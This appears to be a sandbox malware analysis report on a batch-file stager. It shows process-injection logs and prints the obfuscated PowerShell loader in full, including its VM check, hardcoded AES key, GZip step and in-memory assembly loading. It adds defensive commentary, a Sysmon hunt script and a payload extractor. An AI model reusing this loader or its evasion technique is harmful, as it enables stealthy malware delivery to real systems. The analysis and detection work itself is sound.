Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2270000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2980000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 29A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2F00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 620000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 870000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A8C180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242BF650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2578F260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1B68BCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E591C90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2134E400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1A6A2460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EB0CEB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 182A5970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 182A59A0000
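The property worth alerting on in the list above is the fan-out: one dllhost.exe, spawned by powershell.exe with a /Processid:{GUID} argument, writes into dozens of other processes (svchost.exe instances, explorer.exe, RuntimeBroker.exe, WmiPrvSE.exe, the dropped IhrFKM.exe and fOwoBf...exe binaries, and also Windows Defender's MpCmdRun.exe and smartscreen.exe). A legitimate COM surrogate does not open handles to that many unrelated processes. The hunt below is an added example, not part of the Joe Sandbox report, and assumes Sysmon is installed with ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) logging enabled. Sysmon has no dedicated "memory written" event, so ProcessAccess with PROCESS_VM_OPERATION (0x8) or PROCESS_VM_WRITE (0x20) in GrantedAccess, plus CreateRemoteThread, stand in for the WriteProcessMemory/CreateRemoteThread pair the sandbox observed. The 24-hour lookback and the threshold of five distinct targets are assumptions to tune locally.

```powershell
# Added example (not from the report): find a dllhost.exe instance that reaches into
# many other processes, the fan-out the "Memory written" list above shows.
# Assumes Sysmon with Event ID 8 and 10 logging; threshold and lookback are assumptions.
param([int]$Hours = 24, [int]$MinTargets = 5)

$since = (Get-Date).ToUniversalTime().AddHours(-$Hours).ToString('yyyy-MM-ddTHH:mm:ss.fffZ')
$xpath = "*[System[(EventID=8 or EventID=10) and TimeCreated[@SystemTime>='$since']]]" +
         " and *[EventData[Data[@Name='SourceImage']='C:\Windows\System32\dllhost.exe']]"

$events = Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' `
                       -FilterXPath $xpath -ErrorAction SilentlyContinue

$hits = foreach ($e in $events) {
    # Flatten the <Data Name="..."> elements. PowerShell hashtables are case-insensitive,
    # which hides the SourceProcessGUID (ID 10) vs. SourceProcessGuid (ID 8) spelling difference.
    $d = @{}
    foreach ($n in ([xml]$e.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    # GrantedAccess is a hex string such as 0x1FFFFF; it is only present on ID 10.
    $granted = if ($d.GrantedAccess) { [Convert]::ToInt32($d.GrantedAccess, 16) } else { 0 }

    # Keep every remote-thread event; keep ProcessAccess only when the handle can write memory.
    if ($e.Id -eq 8 -or ($granted -band 0x28)) {
        [pscustomobject]@{
            Time       = $e.TimeCreated
            EventId    = $e.Id
            SourceGuid = $d.SourceProcessGuid
            SourcePid  = $d.SourceProcessId
            Target     = $d.TargetImage
            TargetPid  = $d.TargetProcessId
            Granted    = $d.GrantedAccess
        }
    }
}

# One row per dllhost.exe instance (keyed on its process GUID) that touched many distinct images.
$hits | Group-Object SourceGuid | ForEach-Object {
    $targets = @($_.Group.Target | Sort-Object -Unique)
    if ($targets.Count -ge $MinTargets) {
        $ordered = $_.Group | Sort-Object Time
        [pscustomobject]@{
            SourceGuid      = $_.Name
            SourcePid       = $ordered[0].SourcePid
            First           = $ordered[0].Time
            Last            = $ordered[-1].Time
            DistinctTargets = $targets.Count
            Targets         = $targets -join '; '
        }
    }
} | Sort-Object DistinctTargets -Descending | Format-Table -AutoSize -Wrap
```

Pair this with a Sysmon Event ID 1 check for dllhost.exe whose parent is powershell.exe, which is how the instance in this report was started, and treat any source that touches MpCmdRun.exe or smartscreen.exe as high priority regardless of the count. If your Sysmon configuration excludes ProcessAccess events for dllhost.exe (some default-deny templates do), the query returns nothing; verify the rule set before trusting an empty result.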
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\product.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{29a28251-c10b-42e7-8393-a6c218333ff2}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
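The process chain above is the whole stager. cmd.exe first runs `wmic diskdrive get Model` piped into `findstr` for three disk-model strings, a sandbox check against known analysis-VM hardware; if it passes, it echoes a PowerShell script into a hidden `powershell.exe -WindowStyle Hidden`. That script reads the .bat it was launched from, takes the single line beginning with `iecMs`, splits the rest on `\` into three blobs, and for each blob reverses a custom Base64 alphabet (`#` stands for `/`, `@` for `A`), AES-256-CBC-decrypts it with the hardcoded key and IV (the key Base64 is 44 characters, so 32 bytes, and PKCS7 padding), GZip-decompresses the result, and calls `[Reflection.Assembly]::Load` followed by `EntryPoint.Invoke`. The first two assemblies are invoked with `$null`, the third with an empty `string[]`, i.e. a normal `Main(string[] args)`. The `*`-stuffed strings fed to Invoke-Expression exist only to keep `System.Reflection.Assembly`, `GZipStream` and `FromBase64String` out of the command line as literal tokens. The loader then copies the .bat to `C:\Windows\$rbx-onimai2\$rbx-CO2.bat`, re-runs it from there, and deletes a scheduled task named `$rbx-CNT1`.

The extractor below is an added example, not code from the report or the sample. It reproduces the loader's decode chain with the same .NET primitives but writes each recovered assembly to disk instead of loading it, so the stages can be hashed, scanned and opened in a .NET decompiler without executing them. The key and IV are the ones embedded in this sample and are specific to this build; for another sample lift them from its command line. The output folder name is an assumption. Run it on an isolated analysis host regardless.

```powershell
# Added example (not from the report or the sample): dump the three stages that the
# product.bat stager decrypts in memory. Same pipeline as the loader
# (custom Base64 -> AES-256-CBC/PKCS7 -> GZip) but nothing is loaded or invoked.
# Key/IV are taken from the sample's PowerShell; $OutDir is an assumption.
param(
    [Parameter(Mandatory)] [string]$BatPath,
    [string]$OutDir = (Join-Path (Split-Path -Parent $BatPath) 'extracted')
)

$Key = [Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA=')   # 32 bytes
$IV  = [Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q==')                       # 16 bytes

function Unprotect-Stage {
    param([byte[]]$Cipher)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $IV
        $dec = $aes.CreateDecryptor()
        try {
            # Leading comma returns the byte[] as one object instead of unrolling it.
            , $dec.TransformFinalBlock($Cipher, 0, $Cipher.Length)
        } finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-Stage {
    param([byte[]]$Gz)
    $in  = New-Object System.IO.MemoryStream(,$Gz)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray()
    $out.Dispose()
    , $bytes
}

# The loader uses the first line that starts with 'iecMs'; the rest of that line
# holds three '\'-separated blobs.
$payloadLine = Get-Content -LiteralPath $BatPath |
               Where-Object { $_.StartsWith('iecMs') } | Select-Object -First 1
if (-not $payloadLine) { throw "no 'iecMs' payload line found in $BatPath" }
$blobs = $payloadLine.Substring(5).Split('\')

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$i = 0
foreach ($blob in $blobs) {
    if (-not $blob) { continue }
    # Undo the stager's alphabet substitution before standard Base64 decoding.
    $raw = [Convert]::FromBase64String($blob.Replace('#', '/').Replace('@', 'A'))
    $pe  = Expand-Stage (Unprotect-Stage $raw)
    $dst = Join-Path $OutDir ('stage{0}.bin' -f $i)
    [System.IO.File]::WriteAllBytes($dst, $pe)
    [pscustomobject]@{
        Stage  = $i
        Path   = $dst
        Bytes  = $pe.Length
        MZ     = ($pe.Length -ge 2 -and $pe[0] -eq 0x4D -and $pe[1] -eq 0x5A)
        SHA256 = (Get-FileHash -Algorithm SHA256 -LiteralPath $dst).Hash
    }
    $i++
}
```

Invoke it as `.\Extract-Stages.ps1 -BatPath .\product.bat`. A wrong key or IV shows up as a padding exception from `TransformFinalBlock`, and a decrypt that succeeds but yields garbage shows up as a GZip "invalid magic number" exception, so the two failure modes are distinguishable. Stage order matters when you read the dumps: stages 0 and 1 are invoked first with no arguments and, given the signatures in this report (user-mode hooks in other processes, a dllhost.exe surrogate writing into dozens of processes), one of them is the injector; stage 2 receives the `string[]` and is the payload proper.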
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhvna($zvdeq){ $tqyfy=[system.security.cryptography.aes]::create(); $tqyfy.mode=[system.security.cryptography.ciphermode]::cbc; $tqyfy.padding=[system.security.cryptography.paddingmode]::pkcs7; $tqyfy.key=[system.convert]::frombase64string('axhrlwljv4pwkbof9iaijflo6glezt+6bkch3ruytca='); $tqyfy.iv=[system.convert]::frombase64string('txavkyk6lzidmpmpv8o+4q=='); $bqynp=$tqyfy.createdecryptor(); $fzhat=$bqynp.transformfinalblock($zvdeq, 0, $zvdeq.length); $bqynp.dispose(); $tqyfy.dispose(); $fzhat;}function fpymp($zvdeq){ invoke-expression '$fegds=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$zvdeq);'.replace('*', ''); invoke-expression '$xpqra=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$mcrfz=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fegds, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $mcrfz.copyto($xpqra); $mcrfz.dispose(); $fegds.dispose(); $xpqra.dispose(); $xpqra.toarray();}function zhrkt($zvdeq,$ulmvt){ invoke-expression '$ktvmp=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$zvdeq);'.replace('*', ''); invoke-expression '$apgun=$ktvmp.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$apgun.*i*n*v*o*k*e*($null, $ulmvt);'.replace('*', '');}$sqotv = 'c:\users\user\desktop\product.bat';$host.ui.rawui.windowtitle = $sqotv;$kfksq=[system.io.file]::readalltext($sqotv).split([environment]::newline);foreach ($vmudf in $kfksq) { if ($vmudf.startswith('iecms')) { $hjzkz=$vmudf.substring(5); break; }}$brzqf=[string[]]$hjzkz.split('\');invoke-expression '$sti = fpymp (vhvna ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($brzqf[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$jnt = fpymp (vhvna 